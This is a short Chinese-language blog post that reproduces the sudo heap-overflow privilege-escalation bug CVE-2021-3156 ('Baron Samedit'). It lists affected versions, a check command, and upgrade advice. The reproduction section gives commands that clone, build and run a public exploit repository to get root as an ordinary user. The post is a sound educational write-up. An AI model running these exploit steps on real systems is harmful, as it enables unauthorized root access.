0x00 前言
几天前爆出了一个高危sudo提权洞,这我立马就来劲了,赶紧过来复现一波涨涨知识。
0x01 漏洞详情
Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。
2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。
当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码
影响范围
Sudo 1.8.2 - 1.8.31p2 和 Sudo 1.9.0 - 1.9.5p1
sudo >=1.9.5sp2版本不受侵害
测试系统是否受漏洞影响
运行命令sudoedit -s /
如果回显
sudoedit: /: not a regular file
则表示漏洞存在
如果回显
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
则表示漏洞已经被修复
0x02 漏洞复现
环境搭建
我这里用的kali机器
看一下sudo版本
漏洞测试(注意需要用root测试)
接下俩,进入一个普通权限用户
进攻过程
首先我们进入tmp文件夹下载exp
git clone https://github.com/blasty/CVE-2021-3156.git
执行make
接下来./sudo-hax-me-a-sandwich 查看tips
根据自己不同版本选择,我这里运行./sudo-hax-me-a-sandwich 1
成功!
0x03 修复建议
建议及时升级sudo至最新版本。
下载连接:
https://www.sudo.ws/dist/
| 
转播
